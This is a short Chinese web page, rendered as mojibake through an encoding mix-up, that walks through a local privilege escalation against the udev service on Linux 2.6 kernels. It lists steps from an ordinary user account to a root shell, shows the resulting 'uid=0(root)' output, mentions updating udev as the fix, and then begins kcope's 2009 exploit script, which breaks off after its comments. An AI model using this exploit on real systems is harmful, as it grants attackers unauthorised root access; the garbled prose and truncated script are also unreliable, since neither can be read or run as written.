Linux¹¥·ÀÖ®udev©¶´ÑÝʾ

´Ë©¶´Õë¶Ôlinux2.6Äںˣ¬Ö»ÒªÓÐÆÕͨÓû§È¨ÏÞ£¬¼´¿ÉÌáÉýrootȨÏÞ£¬¿ªÊ¼ÊµÑé°É 1¡¢¸´ÖÆÒÔÏ´úÂ룬±£´æΪudev.sh£¬²¢¸³Óè¿ÉÖ´ÐÐȨÏÞ 2¡¢#useradd test //н¨Ò»¸öÆÕͨÓû§ 3¡¢#su - test //Çл»ÖÁtestÓû§ 4¡¢#ps -ef |grep udev //²é¿´udev id root 474 1 0 Apr09 ? 00:00:00 /sbin/udevd -d 5¡¢#sh udev.sh 473 //Ö´ÐÐÃüÁî,udevdµÄidºÅ¼õ1£¬¼´473 6¡¢sh-3.2# id uid=0(root) gid=0(root) groups=506(test) ´ËʱtestÒѾ­ÌáÉýÖÁrootȨÏÞ ÈçºÎÐÞ¸´Â©¶´£¬Ö»ÒªÉý¼¶udev¾ÍÐÐÁË #yum update udev ¸½´úÂ룺 #!/bin/sh # Linux 2.6 # bug found by Sebastian Krahmer # # lame sploit using LD technique # by kcope in 2009 # tested on debian-etch,ubuntu,gentoo # do a 'cat /proc/net/netlink' # and set the first arg to this # script to the pid of the netlink socket # (the pid is udevd_pid - 1 most of the time) # + sploit has to be UNIX formatted text :) # + if it doesn't work the 1st time try more often # # WARNING: maybe needs some FIXUP to work flawlessly ## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang cat > udev.c program.c suid.c